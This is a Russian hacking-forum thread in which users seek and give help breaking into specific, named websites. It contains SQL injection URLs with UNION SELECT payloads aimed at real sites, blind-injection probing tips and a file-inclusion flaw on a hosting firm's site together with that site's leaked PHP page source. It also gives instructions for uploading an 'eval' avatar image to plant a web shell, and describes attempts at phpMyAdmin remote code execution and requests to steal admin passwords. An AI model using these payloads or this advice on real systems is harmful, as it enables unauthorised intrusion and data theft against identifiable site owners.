Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    все страницы полистай там их 13 :cool:
     
  2. ~{OmRus}~

    ~{OmRus}~ New Member

    Joined:
    27 Aug 2011
    Messages:
    24
    Likes Received:
    2
    Reputations:
    1
    Нечего не работает пишет что на сторочке такой то ошибка :( Как еще залить?
     
  3. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    nginx Buffer Underflow Vulnerability
    Как юзать?
     
  4. Manok

    Manok New Member

    Joined:
    27 Jun 2010
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Довел 1 сайт до:
    Суть в том, что есть некая страница page.html?...&c=

    ... — некоторые параметры, не в них суть.

    &c= — можно указать что угодно. Если указать какой-нибудь некорректный знак выдает эту ошибку.

    Что можно с этим сделать?

    Также есть страницы newsN.html (где N — номер новости).
    Видимо расширение сделано с помощью .htaccess, т.к. можно ввести даже news-1.html ; news9999999999.html — и страница откроется (новость пустая, но открывается же).
    Можно с этим что-то сделать?
     
  5. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,186
    Likes Received:
    618
    Reputations:
    690
    news2.html true
    news1+1.html true
    news3'.html false
    как blind можно попробовать.
     
    _________________________
  6. golnzales

    golnzales New Member

    Joined:
    25 Aug 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Нашел на одном сайте PMA v2.11.9 со скриптом установки setup.php. PHP стоит 5.2.10. Попробывал все доступные экспы по RCE - и через ftp и через сессии от Snipper`а, а результата нет.
    При использовании экспа для ftp выводил phpinfo(); exit; конструкции. Должно было вывалится окно phpinfo, но на выводе все равно только стандартное окно установшика.
    Прошу помощи у знатоков. В чем может быть причина?
     
  7. Manok

    Manok New Member

    Joined:
    27 Jun 2010
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    news2.html - заходит
    news1+1.html - выдает первую страницу?
    news3'.html - открывает третью, вроде не экранируется.

    Есть возможность блинда?
     
  8. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    http://yesphun[antigoogle].com/index.php?p=1
    Вроде нашел инклуд. Как обрезать расширение? %00 не пашет!
     
  9. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    К примеру малоизвестный способ чтения файлов:
    PHP:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
    "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    <head>
    <title>YESPHUN.COM - Sabah's 1st Low-Cost Malaysia Web Hosting Services</title>
    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
    <meta name="description" content="YESPHUN.COM is Sabah low-cost web hosting provider since 2008. We do provide Domain Registration, Shared Hosting Plan, Reseller Hosting Plan, Dedicated Servers, Web Design, E-Commerce Solutions, Blog Solutions, Forum Solutions & etc.">
    <meta name="keywords" content="Low Cost, Web Design, yesphun, sabah website design, malaysia website design, graphic design, script writing, script installation, web hosting, sandakan web hosting, sabah web hosting, malaysia web hosting, kota kinabalu, sandakan, e-commerce, forum, blog, affordable">
    <link rel="stylesheet" href="css/style.css" type="text/css" />
    <link rel="shortcut icon" href="favicon.ico" type="image/x-icon" />
    <link rel="icon" href="favicon.ico" type="image/x-icon" />
    <!-- Powered by YESPHUN System v6.0 -->
    </head>
    <script type="text/javascript" src="java/jquery.js"></script>
    <script type="text/javascript" src="java/tween.js"></script>
    <script type="text/javascript">
    var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
    document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
    </script>
    <script type="text/javascript">
    try {
    var pageTracker = _gat._getTracker("UA-12321486-1");
    pageTracker._trackPageview();
    } catch(err) {}</script>
    <script language="JavaScript" type="text/JavaScript">
    <!--
    function MM_jumpMenu(targ,selObj,restore){
      eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
      if (restore) selObj.selectedIndex=0;
    }
    //-->
    </script>
    <div id="fb-root"></div>
    <script>
      window.fbAsyncInit = function() {
        FB.init({appId: 'your app id', status: true, cookie: true,
                 xfbml: true});
      };
      (function() {
        var e = document.createElement('script'); e.async = true;
        e.src = document.location.protocol +
          '//connect.facebook.net/en_US/all.js';
        document.getElementById('fb-root').appendChild(e);
      }());
    </script>

    <style>
    body{
    padding:0;
    margin:0;
    font-family:Arial;
    font-size:12px;
    color:#000000;
    background-color:#8c0007;
    }
    a:link, a:visited {
    color:#000000;
    text-decoration:underline;
    }
    a:active, a:hover {
    color:#990000;
    text-decoration:none;
    }
    </style>
    <style type="text/css">
    img{border:0;}
    </style>
    <body>
    <table width="100%" border="0" cellpadding="0" cellspacing="0">
      <!--DWLayoutTable-->
      <tr>
        <td width="26" height="80" valign="top" bgcolor="#CF141D"><!--DWLayoutEmptyCell-->&nbsp;</td>
        <td width="705" align="left" bgcolor="#CF141D"><a href="index.php"><img src="img/yesphuncom-white-300-80.jpg" border="0"></a></td>
        <td width="529" align="right" valign="top" bgcolor="#CF141D"><!--DWLayoutEmptyCell-->&nbsp;</td>
      </tr>
    </table>
    <table width="1249" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
      <!--DWLayoutTable-->
      <tr>
        <td height="40" colspan="2" class="language">
            <div class="lang" align="center">YESPHUN IT CENTRE (001975944-K)
          </div>
        </td>
        <td height="40" width="3" rowspan="2" valign="top"><!--DWLayoutEmptyCell-->&nbsp;</td>
        <td height="40" colspan="5" rowspan="2" valign="top"><ul id="menu">
          <li><a href="index.php">Home</a></li>
          <li><a href="?p=hosting/hosting&host=hosting/select">Web Hosting</a></li>
          <li><a href="?p=domain/domain&domain=domain/pricing">Domain Name</a></li>
          <li><a href="?p=services/services&ser=services/ser-select">Services</a></li>
          <li><a href="?p=promo/promotion">Promotions</a></li>
          <li><a href="http://billing.yesphun.com/cart.php" target="_blank">Sign up</a></li>
          <li><a href="?p=online/paymentinfo">Payment Info</a></li>
          <li><a href="?p=faq/faq">FAQs</a></li>
          <li><a href="?p=contact&cu=eform">Contact Us</a></li>
        </ul></td>
      </tr>
      <tr>
        <td width="4" height="18">&nbsp;</td>
        <td width="289">&nbsp;</td>
      </tr>
      <tr>
        <td height="516"></td>
        <td colspan="4" valign="top"><?php require ('functions.php'); require (''.$body.'.php'); ?></td>
        <td width="4">&nbsp;</td>
        <td colspan="2" valign="top"><table width="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="#CCCCCC">
            <!--DWLayoutTable-->
            <tr>
              <td width="250" height="203" valign="top"><div align="center">
            <p><div class="outer">
      <div class="menu">
          <ul>
              <li><a href="http://billing.yesphun.com/clientarea.php" target="_blank">Manage my billing</a></li>
              <li><a href="?p=updatepayment">Update Payment</a></li>
              <li><a href="http://billing.yesphun.com/submitticket.php" target="_blank">Submit a ticket</a></li>
              <li><a href="http://billing.yesphun.com/supporttickets.php" target="_blank">View/Reply ticket</a></li>
              <li><a href="?p=announcements/news&news=announcements/update">Event & News</a></li>
              <li><a href="?p=domain/domainportal">Domain Login</a></li>
          </ul>
      </div>
      </div></p>
        </div></td>
            </tr>
            
            <tr>
              <td height="75"><table width="100%" border="0" cellpadding="0" cellspacing="0" background="img/follow.gif" bgcolor="#CCCCCC">
                  <tr>
            <td width="9" height="75">&nbsp;</td>
            <td width="232"><div class="update">Follow us on..
                <hr></div>
                <a href="http://www.facebook.com/yesphuncom" target="_blank"><img src="img/facebook.gif" width="24" height="24" border="0"></a>&nbsp;&nbsp;&nbsp;<a href="#" target="_blank"><img src="img/twitter.png" width="25" height="25" border="0"></a>&nbsp;&nbsp;&nbsp;<a href="?p=livechat"><img style="border-style: none;" src="http://messenger.services.live.com/users/[email protected]/presenceimage?mkt=en-US" width="16" height="16" /></a>&nbsp;&nbsp;</td>
            <td width="9">&nbsp;</td>
          </tr>
              </table></td>
            </tr>
            
            <tr>
              <td height="11"></td>
            </tr>
            <tr>
              <td height="209" valign="top"><table width="100%" border="0" cellpadding="0" cellspacing="0">
                  <!--DWLayoutTable-->
                  <tr>
                    <td width="10" height="209" valign="top" bgcolor="#EBEBEB"><!--DWLayoutEmptyCell-->&nbsp;</td>
                    <td width="229" valign="top" bgcolor="#EBEBEB"><br /><div class="update">About us..
                      <hr>
                      </div>                  
                      <div align="justify"><strong>YESPHUN.COM</strong> is one of the malaysia low-cost hosting provider since 2008. We do provide Domain Registration, Shared Hosting Plan, Reseller Hosting Plan, and Dedicated Servers. Besides, we also provided web design, E-Commerce solutions, blog solutions, forum solutions &amp; etc. 
          

           Our promises is to offer you an affordable hosting and high quality of services. Everyone can get a host. </div></td>
                    <td width="11" valign="top" bgcolor="#EBEBEB"><!--DWLayoutEmptyCell-->&nbsp;</td>
                  </tr>
                  <!--DWLayoutTable-->
              </table></td>
            </tr>
            <tr>
              <td height="15">&nbsp;</td>
            </tr>
        </table></td>
      </tr>
      <tr>
        <td height="32" bgcolor="#F0F0F0"></td>
        <td colspan="3" bgcolor="#F0F0F0"><div class="footer">Copyright &copy; 2010 YESPHUN IT CENTRE (001975944-K). All Right Reserved.<br>
        Best view at 1280 x 800 resolution. Recommended browser <a href="http://www.mozilla.com/en-US/" target="_blank">Mozilla Firefox 3.6++</a> or <a href="http://www.google.com/chrome/" target="_blank">Google Chrome 5.0++</a></div></td>
        <td colspan="3" bgcolor="#F0F0F0"><div align="right" class="footer"><a href="?p=tnc">Terms &amp; Conditions</a> | <a href="?p=aup">Acceptable Use Policy</a> | <a href="?p=faq/faq">FAQs</a> | <a href="?p=contact&cu=eform">Contact Us </a></div></td>
      <td width="4" bgcolor="#F0F0F0">&nbsp;</td>
      </tr>
      <tr>
        <td height="0"></td>
        <td></td>
        <td></td>
        <td width="416"></td>
        <td width="283"></td>
        <td></td>
        <td width="246"></td>
        <td></td>
      </tr>
    </table>
    <p></p>
    </body>
    </html> 
    Так же, в целях ознакомления советую прочитать эту статью: https://forum.antichat.ru/thread98525.html
     
    2 people like this.
  10. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Нашел вот это.

    http://uk.generic4all.com/upload_files/product_images/product_image_173_small.png/x.php

    Каким образом здесь залить шелл, или это не возможно?
     
    1 person likes this.
  11. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,186
    Likes Received:
    618
    Reputations:
    690
    Регайся в ресурсе и загрузи в профиле eval аватарку и так же вызови файл
    http://uk.generic4all.com/upload_files/product_images/myevilavatar.png/.php
    прочитай еще это http://habrahabr.ru/blogs/sysadm/100961/
     
    _________________________
  12. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Какая установлена база на сайте? MySQL, Orale, PostgreSQL и Ibase не определяются , что дальше делать не знаю.

    http://www.pharmaoffshore[antigoogle].com/customer_testimonials.php?testimonial_id=-4+union+select+null,null,null,null,null,null,null,null,null+--+
     
  13. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    194
    Likes Received:
    5
    Reputations:
    0
    Что мсжно делать дальше?
     
  14. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    HTML:
    http://board.biznews.com.ua/export.php?t=php&n=5&c=0&r=455+UNION%20SELECT%201,2,3,4,group_concat(TABLE_NAME)%20FROM%20INFORMATION_SCHEMA.TABLES
     
    1 person likes this.
  15. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    194
    Likes Received:
    5
    Reputations:
    0
    Как можно залить шелл??Или выдернуть пасс админа?
     
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    а ты статейки почитай милок...не все же за тебя делать надо.
     
  17. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    194
    Likes Received:
    5
    Reputations:
    0
    До меня быстрей доходит на примерах.
     
  18. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862

    Если честно - я не увидел тут скулю.
     
    _________________________
  19. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    >До меня быстрей доходит на примерах.

    И мне помогите со скульей:
    PHP:
    http://cdo.kz/ru/default/index/search?q={SQL-CODE}
     
    #17959 Kuteke, 30 Sep 2011
    Last edited: 30 Sep 2011
  20. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    по-моему, скули нету...
     
Thread Status:
Not open for further replies.